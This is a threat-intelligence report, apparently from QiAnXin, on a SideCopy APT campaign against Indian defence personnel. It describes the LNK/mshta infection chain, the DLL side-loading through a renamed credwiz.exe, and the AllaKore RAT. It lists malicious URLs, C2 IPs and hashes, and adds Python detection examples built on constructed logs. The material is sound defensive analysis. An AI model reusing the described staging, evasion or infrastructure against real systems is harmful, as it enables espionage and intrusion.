
Background

In September 2020, Quick Heal revealed an espionage operation against the Indian Defense forces and armed forces personnel and named it Operation SideCopy. The operation began in early 2019, and its attackers mainly used the TTPs of the Sidewinder APT group to carry out attacks, hence it was named Operation SideCopy.

In July 2021, Cisco Talos researchers tracked the attackers behind Operation SideCopy as an independent group and named it the SideCopy APT group. The report disclosed that the group used various attack weapons, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT, and several C# plugins [1].

Recently, during our continuous tracking of the SideCopy group, we discovered some interesting samples.


Overview

In this attack activity, SideCopy's infection chain closely matches its previous campaigns. It uses a malicious LNK file as the entry point, followed by a multi-stage infection chain with several layers of nested files that finally delivers the payload. Based on our analysis, the main characteristics of this activity are as follows:

  1. Spear-phishing emails carrying a compressed archive, with an LNK file inside the archive as the attack entry point;
  2. Subsequent payloads are loaded and executed in memory without being written to disk;
  3. The final payload is either a modified open-source Trojan written in Delphi or a new Trojan written in C++;
  4. The bait content is related to the Indian Ministry of Defense.

The attack process is shown in the following figure:


Sample Analysis

0x01 Basic Information

The captured sample is a compressed package with the following basic information:

Filename: Grant-of-Risk-and-Hardship-Allowance-JCOs-OR.zip
MD5: 577419F202182F6E933C1CF83EF922EA
File size: 325484 bytes
File type: Zip

After decompression, the archive contains a hidden folder named "Adobe" and a bait LNK file. The LNK file is named "Grant of Risk and Hardship Allowance".

Analysis of the LNK file shows that it uses the system's mshta.exe to contact the C2 and download and execute the next-stage payload.


0x02 Phase One

Accessing the link in the LNK file will redirect to “https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta” to download a piece of JS code to execute.

Its main function is to load a DLL in memory, use functions in that DLL to decrypt the data embedded in the JS code, and drop the PDF bait.

The function "openthefile" decrypts and drops the PDF bait.

The displayed PDF bait is shown below:

Then it collects information about the installed antivirus software, concatenates it with the string "anvaro =", and uploads the result via an HTTP POST request to “https://kcps.edu[.]in/css/fonts/files/avena/”.

It then creates the directory “C:\ProgramData\HP”, downloads data from the C2, saves it as “C:\ProgramData\HP\jquery.hta” and “C:\ProgramData\HP\jscy.hta”, and executes both files.
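Phase One gives a defender two cheap process-creation signals: mshta.exe launched by explorer.exe with a remote URL on its command line (what opening the LNK looks like), and mshta.exe later executing an .hta file from C:\ProgramData. The following is an added example, not code from the original report, that runs those two checks over constructed Sysmon-style process-creation records; the benign records, the vendor paths in them and the rule names are assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1) modelled on
# the Phase One behaviour described above. These are sample records written
# for this example, not telemetry from the real infection.
SAMPLE_EVENTS = [
    {   # LNK opened by the user: explorer.exe launches mshta.exe with a remote HTA
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta',
    },
    {   # second-stage HTA dropped to C:\ProgramData\HP and executed
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\ProgramData\HP\jquery.hta"',
    },
    {   # benign (assumed): a vendor installer using mshta with a local UI file
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Program Files\ExampleVendor\setup.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\ExampleVendor\ui.hta"',
    },
    {   # benign: unrelated process
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt',
    },
]

# Any http(s) URL handed to mshta.exe means the HTA is fetched from the network.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# C:\ProgramData is writable by ordinary users; script hosts running .hta
# files from it match the drop location named in the report.
PROGRAMDATA_HTA = re.compile(r"C:\\ProgramData\\.*\.hta\b", re.IGNORECASE)


def image_name(path):
    """Last path component, lower-cased, for case-insensitive comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names the record matches (empty if clean)."""
    hits = []
    if image_name(event["Image"]) != "mshta.exe":
        return hits
    cmd = event["CommandLine"]
    if REMOTE_URL.search(cmd):
        hits.append("mshta_remote_hta")
        if image_name(event["ParentImage"]) == "explorer.exe":
            # explorer.exe as parent is consistent with a user double-clicking an LNK
            hits.append("mshta_from_explorer")
    if PROGRAMDATA_HTA.search(cmd):
        hits.append("mshta_programdata_hta")
    return hits


def scan(events):
    """Return (command line, rule names) for every record that matched."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_EVENTS):
        print(rules, cmd)
```

The first record trips both the remote-URL rule and the explorer-parent rule, the second trips only the ProgramData rule, and the two benign records trip nothing; in production the same logic is usually expressed as a Sigma or EDR rule rather than Python, but the conditions are the ones shown.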


0x03 Phase Two

The downloaded HTA files are similar to Phase One: they load a DLL in memory and first collect information about the installed antivirus software via WMI. They then call the SearchProducts function in the DLL, passing a piece of hard-coded data and the antivirus information as parameters.

The SearchProducts function first checks which antivirus product is installed to decide how to launch the subsequent payloads. The antivirus products it checks for are:

Antivirus software checked:
  • Kaspersky
  • Avira
  • Quick Heal
  • Bitdefender
  • Avast
  • WindowsDefender

When the Indian antivirus product "Quick Heal" is present, the DLL first copies the system's Credwiz.exe into the directory “C:\Users\Public\smitpr” and renames it “crezly.exe”. It then decrypts the DLL data and writes it as “DUser.dll” in the same “C:\Users\Public\smitpr” directory, decrypts the EXE data and drops the program “simsre.exe” in the “smitpr” directory, sleeps for 30 seconds, and finally launches the dropped “crezly.exe”, which side-loads the malicious “DUser.dll”.

During execution, a BAT file is generated that adds a startup entry for crezly.exe through the registry.

When the antivirus software is Kaspersky, Avast, Bitdefender, WindowsDefender, or another product, the malicious components are dropped in essentially the same way as for "Quick Heal", except that the DLL sleeps for one minute and then starts the dropped simsre.exe directly, and the program added to the registry startup entry is simsre.exe as well.

It is worth mentioning that when the antivirus product is not "Quick Heal", a tmplate.txt file is written to the %temp% directory for logging. The author recorded in the log is "Mahesh Chand", an Indian who describes himself on his Twitter profile as a former Microsoft regional director.
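The Phase Two chain leaves three host artefacts that are easy to alert on: a copy of credwiz.exe running outside System32 under another name, DUser.dll loaded from a directory other than System32, and a registry startup entry pointing into C:\Users\Public. The following is an added example, not code from the original report, that checks constructed Sysmon-style records (process creation, image load and registry value set) for these three conditions. The use of the Run key, the SID, the benign vendor path and the rule names are assumptions for the example; the report only says the startup item is added through the registry.

```python
import re

# Constructed Sysmon-style records (Event ID 1 = process create, 7 = image
# load, 13 = registry value set) modelled on the Phase Two chain above.
# These are sample records written for this example, not real telemetry.
SAMPLE_EVENTS = [
    {   # credwiz.exe copied to a public directory and renamed crezly.exe
        "EventID": 1,
        "Image": r"C:\Users\Public\smitpr\crezly.exe",
        "OriginalFileName": "credwiz.exe",   # from the PE version resource
    },
    {   # the renamed copy loads DUser.dll from its own directory (the side-load)
        "EventID": 7,
        "Image": r"C:\Users\Public\smitpr\crezly.exe",
        "ImageLoaded": r"C:\Users\Public\smitpr\DUser.dll",
    },
    {   # persistence: a Run value pointing into C:\Users\Public
        # (Run key and SID are assumptions; the report only says "startup item through the registry")
        "EventID": 13,
        "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\crezly",
        "Details": r"C:\Users\Public\smitpr\crezly.exe",
    },
    {   # benign: the real credwiz.exe loading the real DUser.dll from System32
        "EventID": 7,
        "Image": r"C:\Windows\System32\credwiz.exe",
        "ImageLoaded": r"C:\Windows\System32\DUser.dll",
    },
    {   # benign (assumed): a vendor application registering itself at logon
        "EventID": 13,
        "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\ExampleApp",
        "Details": r"C:\Program Files\ExampleVendor\app.exe",
    },
]

# Directories where the legitimate copies of credwiz.exe and DUser.dll live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SIDELOAD_HOSTS = {"credwiz.exe"}   # signed host binary abused in the report
SIDELOAD_DLLS = {"duser.dll"}      # DLL the host resolves from its own directory
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def check(event):
    """Return the name of the matching rule, or None if the record is clean."""
    eid = event["EventID"]
    if eid == 1:
        # A binary whose PE original name is credwiz.exe but which runs from
        # outside System32 is the renamed host the report describes.
        if (basename(event["OriginalFileName"]) in SIDELOAD_HOSTS
                and not in_system_dir(event["Image"])):
            return "renamed_system_binary_outside_system32"
    elif eid == 7:
        # DUser.dll is a Windows system DLL; a copy loaded from any other
        # directory is the side-load itself.
        if (basename(event["ImageLoaded"]) in SIDELOAD_DLLS
                and not in_system_dir(event["ImageLoaded"])):
            return "duser_dll_sideload"
    elif eid == 13:
        # Run-key persistence whose target lives under C:\Users\Public.
        if (RUN_KEY.search(event["TargetObject"])
                and "\\users\\public\\" in event["Details"].lower()):
            return "run_key_public_dir"
    return None


def scan(events):
    """Return (rule name, image or registry path) for every matching record."""
    return [(check(e), e.get("Image", e.get("TargetObject")))
            for e in events if check(e)]


if __name__ == "__main__":
    for rule, where in scan(SAMPLE_EVENTS):
        print(rule, where)
```

The OriginalFileName check is the important one: renaming the host binary defeats filename-based rules, but the PE version resource still says credwiz.exe, and Sysmon records it.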


AllaKore RAT

The dropped simsre.exe is an AllaKore RAT (also known as Cyrus), which SideCopy uses frequently. Its source code is open source on GitHub and has been modified by the SideCopy group as part of its own arsenal. The file information is as follows:

Filename: simsre.exe
MD5: 087E366A4BECCBECB7D7CDB5C2F73088
File size: 8507904 bytes
File type: EXE

The captured AllaKore RAT connects to the IP address 185.229.119.60 on port 9134. Its main functions include:

  • Keylogger
  • Screenshots
  • List folders and files
  • Upload/download files
  • Steal clipboard data
  • Change wallpaper
  • Remote control

DUser.dll

The side-loaded DUser.dll is actually a loader that loads and executes the dropped simsre.exe.


Attribution & Association

During analysis of the sample, we found that this attack mainly targets India. First, the bait content relates to the Indian Ministry of Defense; second, the decryption routine relies on the system's default decoding method, so the bait content and some subsequent payloads decrypt correctly only when the victim computer's system region is set to English (India).
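The region dependency matters to anyone analysing these samples: a sandbox running under a different system locale will produce garbage from the same blob and may report the stage as broken. The report does not show the decryption routine, so the following added example (not the sample's code) models one common way such a dependency arises: the loader carries its encrypted payload as text and converts it back to bytes with the system's default ANSI code page before XOR-decrypting it. The XOR key, the plaintext marker, and the choice of cp1252 as the author's code page are assumptions made for the illustration; the point is that the same text yields different bytes under different code pages.

```python
# Single-byte XOR key and a constructed stand-in for the dropped PE; both are
# assumptions for this example, not values from the real sample.
KEY = 0xA5
PLAINTEXT = b"MZ-constructed-sample-payload"
CIPHERTEXT = bytes(b ^ KEY for b in PLAINTEXT)

# The loader script stores the blob as a text string. The string was written
# on the attacker's own code page (assumed cp1252 here); every ciphertext byte
# above 0x7F becomes an accented character in that text.
EMBEDDED_TEXT = CIPHERTEXT.decode("cp1252")


def decode_blob(text, system_codepage):
    """Mimic a loader that turns its embedded text back into bytes using the
    victim's default code page, then XOR-decrypts the result. Characters the
    victim's code page cannot represent are replaced, as a lossy default
    conversion would do."""
    raw = text.encode(system_codepage, errors="replace")
    return bytes(b ^ KEY for b in raw)


def looks_like_pe(data):
    """Cheap sanity check: a correctly decrypted PE starts with 'MZ'."""
    return data[:2] == b"MZ"


def decode_under(codepages):
    """Report, per code page, whether the blob decrypts to a plausible PE."""
    return {cp: looks_like_pe(decode_blob(EMBEDDED_TEXT, cp)) for cp in codepages}


if __name__ == "__main__":
    # cp1252 matches the author's code page; cp936 is the default on a
    # Simplified Chinese system, where many sandboxes run.
    for cp, ok in decode_under(["cp1252", "cp936"]).items():
        print(cp, "decrypts to a PE" if ok else "produces garbage")
```

Under cp1252 the bytes round-trip and the XOR yields the original plaintext; under cp936 the accented characters encode to two-byte sequences or replacement characters, so the decrypted data no longer starts with MZ. When a sample's stages appear to fail in a sandbox, matching the victim's system locale (here English (India)) before re-running is the first thing to try.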

Code-level analysis of the captured samples shows that the malicious code used in this attack is almost identical to the attack methods the SideCopy group commonly uses.

By pivoting on the initial LNK file of this attack, we also discovered another similar attack sample.

Its bait is documentation on the development of the nuclear-capable medium-range submarine-launched ballistic missile (K4 missile) by the Indian Defense Research and Development Organization (DRDO) to arm the Arihant-class submarines. The bait content is as follows:

Its execution process is basically the same as analyzed above. The difference is that its final payload, DUser.dll, is written in C++ and has a low detection rate on VirusTotal. Its C2 is 144.91.72.17:8080, and it also carries PDB path information.

In addition, during extended analysis we also found a large number of LNK-based attack samples recently used by the SideCopy group.

Last year we also observed the SideCopy group using pornographic images as LNK file icons in its attacks, which can be described as a tried and tested method.


Summary

The SideCopy group mainly copies the TTPs of the Sidewinder APT group for its attacks. It has come into the public eye in recent years, and its attack methods and weapon code are relatively immature compared to other threat groups in the same region, with most of its tools built from open-source code and tools available on the internet. More importantly, we have previously disclosed its attacks on multiple platforms such as Linux and macOS [2]. QiAnXin Threat Intelligence Center will conduct long-term tracking and follow-up on this threat actor, discovering security threats in a timely manner and responding to them.

The captured samples mainly target the South Asian region, and domestic users are not affected. The QiAnXin Red Raindrop team reminds users to beware of watering-hole attacks, not to open links from unknown sources shared on social media, not to click on email attachments from unknown sources, not to run unknown files with exaggerated titles, and not to install apps from unofficial sources. Also, be sure to back up important files in a timely manner and to update and install patches.

If you need to run an application of unknown origin, you can first submit it to the QiAnXin Threat Intelligence File Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page) for identification. Currently, all products based on QiAnXin Threat Intelligence Center's threat intelligence data, including the QiAnXin Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situation Awareness, support accurate detection of such attacks.


IOCs

MD5

577419F202182F6E933C1CF83EF922EA

3E3D3F78A07BAB5A3342E0414E48D787

087E366A4BECCBECB7D7CDB5C2F73088

26E41AF2CA9EA82C244C1AA1EC77654A

FA6C832E22F978B8210C0630DB69E6A2

EFCC2BF765993711CC9E4E86D2EBB876

191C389140293C782D7A2304893151E2

6528A9F0AF30DF7F4211EF8B341ACC2E

0725318B4F5C312EEAF5EC9795A7E919

AB11B91F97D7672DA1C5B42C9ECC6D2E

CBAA7FC86E4F1A30A155F60323FDB72A

036DA574B5967C71951F4E14D000398C

2E19B7A2BBDC8082024D259E27E86911

3F22B345ED1F9E244DB034F9AF49E707

EDE163036A1754C71D6FF11B266B91CE

5BE4E4884F4E021BA975CBED0A7E9C25

F7D1E515CB84F6DC2D0349AB93BD4E05

63789CACECC1ABD9669344516ADB4120

9B06472E5ACF2311D0AF62D638A8E51A

D129B81C1D40C34AC628835E144A4740

BA2ADA448B8471789C0EF3B3345597FE

6B3F45F7A6758D198A317DE43D51E669

A65EB385C9019C712EA513E4C5C25152

1A1C8C0F5CAFB7DF661086BCB804154C

0C44DA9103FB26DAFC710E83E95AD1C2

61427F7A200D7A21C1CF38FFE2FD4EE5

441F580A36757CF20493029B055F581E

URL

https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta

https://kcps.edu[.]in/css/fonts/files/avena/

https://kcps.edu[.]in/css/fonts/files/ntsfonts/

https://kcps.edu[.]in/css/fonts/files/jquery/

https://www[.]cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta

https://cornerstonebeverly[.]org/js/files/ntfonts/avena/

https://cornerstonebeverly[.]org/js/files/ntfonts/

https://hpuniversity[.]in/uploads/files/women/start

https://hpuniversity[.]in/uploadsssss/files/file2/file2.zip

https://hpuniversity[.]in/uploadsssss/files/file3/file3.zip

https://hpuniversity[.]in/uploadsssss/files/women/Women.zip

https://hpuniversity[.]in/uploadsssss/files/survey/Survry.zip

http://hpuniversity[.]in/filessss/software/SoftWare.zip

https://hpuniversity[.]in/documents/women/Women.zip

https://hpuniversity[.]in/documents/assignment1/assignment1.zip

https://hpuniversity[.]in/filessss/principles/Principles.zip

https://hpuniversity[.]in/documents/survey/start/2.hta

IP

89.117.63.146:9921

185.229.119.60:9134

144.91.72.17:8080


Reference

[1]. https://blog.talosintelligence.com/2021/07/sidecopy.html

[2]. https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/
